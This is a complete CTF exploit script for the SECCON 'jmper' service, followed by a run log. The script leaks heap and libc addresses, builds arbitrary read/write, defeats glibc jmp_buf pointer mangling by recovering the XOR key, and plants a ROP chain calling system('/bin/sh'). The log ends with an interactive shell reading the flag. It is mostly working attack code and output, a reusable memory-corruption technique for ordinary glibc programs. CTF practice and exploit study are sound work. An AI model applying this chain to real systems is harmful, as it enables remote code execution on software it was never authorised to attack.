#!/usr/bin/python
# -*- coding: utf-8 -*-
import socket
import struct
import telnetlib
from time import sleep
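def sock(remoteip, remoteport):
    """Open a TCP connection to ``(remoteip, remoteport)``.

    Returns the connected socket and an unbuffered read/write file object
    wrapping it (Python 2 ``makefile(mode, bufsize)`` signature).

    ``socket.create_connection`` replaces the hand-built ``AF_INET`` socket:
    it resolves the host for every address family and closes the socket
    itself when ``connect()`` fails, instead of leaving it open.
    """
    s = socket.create_connection((remoteip, remoteport))
    # bufsize=0: each write() is sent immediately rather than held in a buffer.
    f = s.makefile('rw', bufsize=0)
    return s, f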
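def read_until(f, delim='\n'):
    """Read from ``f`` one character at a time until ``delim`` has been seen.

    Args:
        f: file-like object with a ``read(n)`` method.
        delim: terminator to stop at; an empty delimiter returns '' at once.

    Returns:
        Everything read, including the delimiter.

    Raises:
        EOFError: if the stream ends before the delimiter appears. The
            original kept calling ``read(1)`` after EOF, which returns ''
            forever, so a closed connection turned into a busy loop.
    """
    data = ''
    while not data.endswith(delim):
        ch = f.read(1)
        if not ch:
            raise EOFError('stream closed before %r was seen (got %r)' % (delim, data))
        data += ch
    return data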
def p(a):
    """Pack the integer ``a`` as a little-endian unsigned 64-bit value (8 bytes)."""
    packer = struct.Struct('<Q')
    return packer.pack(a)
def u(a):
    """Unpack exactly 8 bytes of ``a`` as a little-endian unsigned 64-bit integer.

    Any other length raises ``struct.error``; callers pad short leaks first.
    """
    (value,) = struct.Struct('<Q').unpack(a)
    return value
def shell(s):
    """Hand the already-connected socket ``s`` to an interactive telnet session.

    ``Telnet.interact`` relays stdin/stdout to the socket until it closes.
    Note: ``telnetlib`` is deprecated since Python 3.11 and removed in 3.13.
    """
    session = telnetlib.Telnet()
    session.sock = s
    session.interact()
# Remote service for this run; the author's local test target was ('localhost', 4444).
HOST, PORT = 'jmper.pwn.seccon.jp', 5656
s, f = sock(HOST, PORT)
# Consume the opening menu; its last line is '6. Bye :)'.
read_until(f, '6. Bye :)\n')
def ADD_STUDENT():
    """Send menu option 1 (add a student) and wait for the menu to come back."""
    print('[+] Add student!')
    f.write('1\n')
    read_until(f, '6. Bye :)\n')
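def NAME(sid, name):
    """Store ``name`` in the name field of student ``sid`` (menu option 2).

    Args:
        sid: student index, sent to the service as a decimal line.
        name: raw bytes to store, sent as-is (callers add their own
            trailing newline); at most 0x22 bytes.

    Raises:
        ValueError: if ``name`` exceeds 0x22 bytes. The original used
            ``assert``, which is stripped under ``python -O`` and would then
            let an over-long write through silently.
    """
    if len(name) > 0x22:
        raise ValueError('name is %d bytes, limit is 0x22' % len(name))
    print('[+] Write Name: sid:{}, Name:{}'.format(sid, name))
    f.write('2\n')
    f.write('{}\n'.format(sid))
    f.write(name)
    read_until(f, '6. Bye :)\n')
    print('[-] Writed.')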
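def WRITE_MEMO(sid, memo):
    """Store ``memo`` in the memo field of student ``sid`` (menu option 3).

    Args:
        sid: student index, sent to the service as a decimal line.
        memo: raw bytes to store, sent as-is (callers add their own
            trailing newline); at most 0x22 bytes.

    Raises:
        ValueError: if ``memo`` exceeds 0x22 bytes. The original used
            ``assert``, which is stripped under ``python -O``.
    """
    if len(memo) > 0x22:
        raise ValueError('memo is %d bytes, limit is 0x22' % len(memo))
    print('[+] Write Memo: sid:{}, Memo: {}'.format(sid, memo))
    f.write('3\n')
    f.write('{}\n'.format(sid))
    f.write(memo)
    read_until(f, '6. Bye :)\n')
    print('[-] done Memo.')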
def SHOW_NAME(sid):
    """Print and return the name the service holds for student ``sid`` (menu option 4)."""
    f.write('4\n')
    read_until(f, 'ID:')
    f.write('{}\n'.format(sid))
    print("[+] ID: {}'s NAME".format(sid))
    # The reply runs up to the next menu's "1." entry; strip that marker.
    reply = read_until(f, '1.')
    name = reply[:-len('1.')]
    print(name)
    read_until(f, '6. Bye :)\n')
    return name
def SHOW_MEMO(sid):
    """Print and return the memo the service holds for student ``sid`` (menu option 5)."""
    f.write('5\n')
    read_until(f, 'ID:')
    f.write('{}\n'.format(sid))
    print("[+] ID: {}'s MEMO".format(sid))
    # The reply runs up to the next menu's "1." entry; strip that marker.
    reply = read_until(f, '1.')
    memo = reply[:-len('1.')]
    print(memo)
    read_until(f, '6. Bye :)\n')
    return memo
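# libc offsets for the remote build. The commented pair is an alternative the
# author left in; which build it matched is not recorded here.
# libc_puts_offset = 0x6f690
# libc_system_offset = 0x45390
libc_puts_offset = 0x06fd60
libc_system_offset = 0x046590
puts_got = 0x601fa0

ADD_STUDENT()
ADD_STUDENT()
ADD_STUDENT()

# Each memo is exactly 0x22 bytes: 0x20 filler, one chosen byte, newline.
WRITE_MEMO(0, '0' * 0x20 + chr(0x78) + '\n')
WRITE_MEMO(1, '0' * 0x20 + chr(0x08) + '\n')

# Heap leak: student 1's name is read back and unpacked as a qword; the heap
# base follows from the known offset of that chunk.
heap2_offset = 0x278
heap2_addr = u(SHOW_NAME(1).ljust(8, '\x00'))
heap_base = heap2_addr - heap2_offset
print('heap2 addr: {:#x}'.format(heap2_addr))
print('heap base addr: {:#x}'.format(heap_base))

# jmp_buf sits at a fixed heap offset; +0x30 / +0x38 are the slots the
# script later reads and writes (the "xored" stack and jump values).
jmp_buf_offset = 0x110
jmp_buf = heap_base + jmp_buf_offset  # was 'heap_base + 0x110', bypassing the named constant
xored_stack_addr = jmp_buf + 0x30
xored_jmp_addr = jmp_buf + 0x38
# Value expected in the jump slot; XORed with the leaked (un-rotated) slot
# contents further down to recover the key.
xor_a = 0x400c31

# libc leak: after the memo writes above, a qword written into student 0's
# name selects an address and reading student 1's name returns its contents.
NAME(0, p(puts_got) + '\n')
libc_puts = u(SHOW_NAME(1).ljust(8, '\x00'))
libc_base = libc_puts - libc_puts_offset
libc_system = libc_base + libc_system_offset
print('puts addr: {:#x}'.format(libc_puts))
print('libc base: {:#x}'.format(libc_base))
print('system addr: {:#x}'.format(libc_system))

# 0x00400cc3: pop rdi ; ret ; (1 found)
popret = 0x00400cc3
data_addr = 0x602000
# Same pairing as the write path: student 0's name selects the address,
# student 1's name supplies the bytes stored there.
NAME(0, p(data_addr) + '\n')
NAME(1, '/bin/sh' + '\n')
print('/bin/sh addr: {:#x}'.format(data_addr))

# Two qwords at rop_addr: the "/bin/sh" pointer, then system().
rop_addr = 0x602f00
NAME(0, p(rop_addr) + '\n')
NAME(1, p(data_addr) + '\n')
NAME(0, p(rop_addr + 8) + '\n')
NAME(1, p(libc_system) + '\n')
print('set rop gadget')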
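def lol(x, bits=17, width=64):
    """Rotate ``x`` left by ``bits`` within a ``width``-bit word.

    The original sliced a zero-padded binary string, which misbehaves for
    values wider than 64 bits (never truncated) and for negatives (``bin()``
    adds a '-' prefix). Bit arithmetic returns the same result for every
    0 <= x < 2**width and masks anything wider. ``bits``/``width`` default
    to the original's fixed 17/64, so existing callers are unchanged.

    Args:
        x: integer to rotate; reduced modulo 2**width first.
        bits: rotation amount, taken modulo ``width``.
        width: word size in bits.

    Returns:
        The rotated value as a non-negative integer below 2**width.
    """
    mask = (1 << width) - 1
    x &= mask
    bits %= width
    return ((x << bits) | (x >> (width - bits))) & mask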
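def ror(x, bits=17, width=64):
    """Rotate ``x`` right by ``bits`` within a ``width``-bit word.

    Inverse of ``lol`` for the same ``bits``/``width``. Like ``lol``, this
    replaces the string-slicing rotation with bit arithmetic so values that
    do not fit in 64 bits are masked instead of producing garbage, and
    negatives are reduced modulo 2**width. Defaults match the original 17/64.

    Args:
        x: integer to rotate; reduced modulo 2**width first.
        bits: rotation amount, taken modulo ``width``.
        width: word size in bits.

    Returns:
        The rotated value as a non-negative integer below 2**width.
    """
    mask = (1 << width) - 1
    x &= mask
    bits %= width
    return ((x >> bits) | (x << (width - bits))) & mask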
# Point the student-0 name at the jump slot of jmp_buf and read it back.
NAME(0, p(xored_jmp_addr) + '\n')
print 'set xored_jmp_addr'
print 'xored jmp addr: {:#x}'.format(xored_jmp_addr)
hoge = SHOW_NAME(1)  # raw leak; only the first 8 bytes are the qword
xored_jmp = u(hoge[:8].ljust(8, '\x00'))
print 'get xored_jmp_addr value'
# Recover the key: undo the 17-bit rotation, then XOR with the value known
# to sit in that slot (xor_a). New values are mangled the other way round:
# XOR with the key, then rotate left.
xor_key = ror(xored_jmp) ^ xor_a
target_addr = popret
xored_target_addr = lol(target_addr ^ xor_key)
xored_rop_addr = lol(rop_addr ^ xor_key)
print 'xored jmp addr: {:#x}'.format(xored_jmp_addr)
print 'xored jmp: {:#x}'.format(xored_jmp)
print 'xored key: {:#x}'.format(xor_key)
print 'target addr: {:#x}'.format(target_addr)
print 'xored target addr: {:#x}'.format(xored_target_addr)
print 'rop stack addr: {:#x}'.format(rop_addr)
print 'xored rop stack addr: {:#x}'.format(xored_rop_addr)
# Write the mangled gadget address into the jump slot (student 0's name
# still points there), then move student 0 to the stack slot and write the
# mangled ROP address. Order matters: each NAME(0, ...) selects the address
# for the following NAME(1, ...).
NAME(1, p(xored_target_addr) + '\n')
NAME(0, p(xored_stack_addr) + '\n')
NAME(1, p(xored_rop_addr) + '\n')
# 27 more adds: in the run log below the service prints
# "Exception has occurred. Jump!" right after these, so presumably the
# table is full and the final '1' (one more add) takes the longjmp path.
for _ in range(27):
    ADD_STUDENT()
f.write('1\n')
shell(s)

otms61 commented Dec 10, 2016

python jmper.py
[+] Add student!
[+] Add student!
[+] Add student!
[+] Write Memo: sid:0, Memo: 00000000000000000000000000000000x

[-] done Memo.
[+] Write Memo: sid:1, Memo: 00000000000000000000000000000000

[-] done Memo.
[+] ID: 1's NAME
xR.
heap2 addr: 0x22e5278
heap base addr: 0x22e5000
[+] Write Name: sid:0, Name:�`

[-] Writed.
[+] ID: 1's NAME
`�F��
puts addr: 0x7fd246129d60
libc base: 0x7fd2460ba000
system addr: 0x7fd246100590
[+] Write Name: sid:0, Name: `

[-] Writed.
[+] Write Name: sid:1, Name:/bin/sh

[-] Writed.
/bin/sh addr: 0x602000
[+] Write Name: sid:0, Name:/`

[-] Writed.
[+] Write Name: sid:1, Name: `

[-] Writed.
[+] Write Name: sid:0, Name/`

[-] Writed.
[+] Write Name: sid:1, Name:�F��

[-] Writed.
set rop gadget
[+] Write Name: sid:0, Name:HQ.

[-] Writed.
set xored_jmp_addr
xored jmp addr: 0x22e5148
[+] ID: 1's NAME
��z
get xored_jmp_addr value
xored jmp addr: 0x22e5148
xored jmp: 0x7a13930ef21b1e9b
xored key: 0x8f4dbd09c9c7753c
target addr: 0x400cc3
xored target addr: 0x7a13930ef3ff1e9b
rop stack addr: 0x602f00
xored rop stack addr: 0x7a13934eb4791e9b
[+] Write Name: sid:1, Name:����z

[-] Writed.
[+] Write Name: sid:0, Name:@Q.

[-] Writed.
[+] Write Name: sid:1, Name:�y�N�z

[-] Writed.
[+] Add student!
[+] Add student!
[+] Add student!
[+] Add student!
[+] Add student!
[+] Add student!
[+] Add student!
[+] Add student!
[+] Add student!
[+] Add student!
[+] Add student!
[+] Add student!
[+] Add student!
[+] Add student!
[+] Add student!
[+] Add student!
[+] Add student!
[+] Add student!
[+] Add student!
[+] Add student!
[+] Add student!
[+] Add student!
[+] Add student!
[+] Add student!
[+] Add student!
[+] Add student!
[+] Add student!
Exception has occurred. Jump!
ls
flag
jmper
cat flag
SECCON{3nj0y_my_jmp1n9_serv1ce}
